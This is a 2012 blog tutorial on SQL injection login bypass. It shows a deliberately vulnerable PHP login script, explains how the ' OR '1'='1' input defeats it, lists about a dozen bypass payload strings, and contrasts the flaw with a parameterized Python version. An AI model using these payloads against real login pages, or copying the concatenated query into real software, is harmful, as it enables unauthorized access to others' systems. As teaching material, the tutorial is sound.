Saturday, June 2, 2012

Admin Login Access

Welcome to this post, where I will discuss how a single SQL query can give access to the Admin Panel; in other words, the first basic SQL Injection.

By now you should know how the connection works from the user end to the back-end database.

   WARNING        WARNING        WARNING        WARNING        WARNING        WARNING
=====================================================================================
DO NOT TRY THIS ON WEBSITES OR APPLICATIONS WHERE YOU DO NOT HAVE PERMISSION. FOR ANY ILLEGAL ISSUES, NEITHER I NOR THE CONTENTS OF THIS BLOG WILL BE HELD RESPONSIBLE.

THIS IS ONLY FOR EDUCATIONAL PURPOSES.

=====================================================================================

So we have a Login page in front of us, and we want to see whether we can get access to the Admin Panel.

We apply a simple piece of SQL logic and check whether we get access.

Let's look at the HTML code on the user's end:

<form method="GET" action="login.php">
Name: <input type="text" name="uname" />
Password: <input type="password" name="pwd" />
<br />
<input type="submit" value="Login" name="login" />
</form>

Which gives us the section below:

ADMIN LOGIN PANEL

Name:
Password:

Now let's check a basic PHP script that connects to the back-end database when some value is entered in the Name and Password fields and Submit is clicked.


<?php

if ( isset ( $_GET['login'] ) ) //When user clicks the submit button
{

//Connects To the Database
$con = mysql_connect ( "localhost", "username", "password" ) or die ( "Could Not Connect To Database" );
//Selects the database that holds the Users table ("dbname" is a placeholder)
mysql_select_db ( "dbname", $con ) or die ( "Could Not Select Database" );

//Building the SQL Query (user input is pasted straight into the query text)
$qry = "SELECT id FROM Users WHERE user = '" . $_GET['uname'] . "' AND password = '" . $_GET['pwd'] . "'";

//Make the Query
$getresult = mysql_query ( $qry ) or die ( "Query Failed" );

//Check the number of Rows returned from the Query
$rows = mysql_num_rows ( $getresult );

//Validates and Returns the User
if ( $rows != 0 )
{
    header ( "Location: admin.php" ); //Redirects to admin.php
    exit;
}
else
{
    die ( "Invalid Username Or Password" ); //No rows returned for these credentials
}

}

?>

If we look at the SQL Query, it is:

SELECT id FROM Users
WHERE user =
AND password =

If the Username and Password match a row (that is, a valid ID), the user is logged in; if not, the script says "Invalid Username Or Password". For example:

SELECT id FROM Users
WHERE user = 'Computer'
AND password = 'Korner'

The Output will be:

"Invalid Username Or Password"

That is obvious, because there is no such record in the database.

Now what if we change the logic with a simple addition to the password field, so the query becomes:

SELECT id FROM Users
WHERE user = 'Computer'
AND password = 'Korner' OR '1' = '1'

Notice how the logic changes; because AND binds tighter than OR, the database reads it as:

SELECT id FROM Users
WHERE ( user = 'Computer' AND password = 'Korner' ) OR ( '1' = '1' )

This means either side is enough: if the first condition fails, the second is still evaluated, and the second condition is simple logic, 1 is always equal to 1, so it is always True, and the query returns every row in the table.

The $rows count will not be zero in this case, so the page is redirected to the admin panel. This gives access to all the admin privileges.
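To see the same check with and without the flaw, here is an added Python stand-in for the PHP script above (not code from the original post), using an in-memory SQLite table with one constructed admin record. The first login function glues the input into the query text exactly as the PHP does; the second passes the values as parameters, so the quote in the password can no longer change the logic.

```python
import sqlite3

# Constructed sample data: one admin account, invented for this demo only.
SCHEMA = """
CREATE TABLE Users (id INTEGER PRIMARY KEY, user TEXT, password TEXT);
INSERT INTO Users (user, password) VALUES ('admin', 's3cret');
"""


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_login(con, uname, pwd):
    """Mirrors the blog's PHP: credentials are pasted into the SQL text,
    so a quote in the input becomes part of the WHERE clause."""
    qry = ("SELECT id FROM Users WHERE user = '" + uname
           + "' AND password = '" + pwd + "'")
    rows = con.execute(qry).fetchall()
    return len(rows) != 0  # same test as `$rows != 0` in the PHP


def safe_login(con, uname, pwd):
    """Hardened form: placeholders keep the SQL fixed and the driver
    sends the values separately, so quotes are just characters."""
    qry = "SELECT id FROM Users WHERE user = ? AND password = ?"
    rows = con.execute(qry, (uname, pwd)).fetchall()
    return len(rows) != 0


def demo():
    """Run the page's three cases through both versions of the check."""
    con = make_db()
    payload = "Korner' OR '1'='1"   # the password-field input from the post
    return {
        "valid_vuln": vulnerable_login(con, "admin", "s3cret"),
        "wrong_vuln": vulnerable_login(con, "Computer", "Korner"),
        "inject_vuln": vulnerable_login(con, "Computer", payload),
        "valid_safe": safe_login(con, "admin", "s3cret"),
        "wrong_safe": safe_login(con, "Computer", "Korner"),
        "inject_safe": safe_login(con, "Computer", payload),
    }


if __name__ == "__main__":
    for case, granted in demo().items():
        print(case, "->", "access granted" if granted else "denied")
```

Only the vulnerable version lets the injected password through; the parameterized version treats the whole string as a literal password and denies it.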

A few more strings that, when appended to the input, give access in the same way are:

' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
1'or'1'='1

NOTE:
=======================================================================
THIS IS FOR YOUR KNOWLEDGE. DON'T BREAK ADMIN PANELS TO PROVE YOURSELF A L33T OR ELITE HACKER, BECAUSE THIS IS THE LAMEST THING ONE CAN DO. MANY KIDDIE-SCRIPTERS DO IT WITHOUT UNDERSTANDING THE LOGIC AND FEEL HAPPY. PLEASE AVOID THIS, OR AT LEAST DON'T TALK SHIT ABOUT POOR SECURITY, BECAUSE IF YOU ARE GIVEN A SCRIPT TO WRITE TO FILTER THIS, YOU WILL HAVE NO PLACE TO HIDE.
=======================================================================

"LEARN TO PROTECT!"        "LEARN TO PROTECT!"        "LEARN TO PROTECT!"
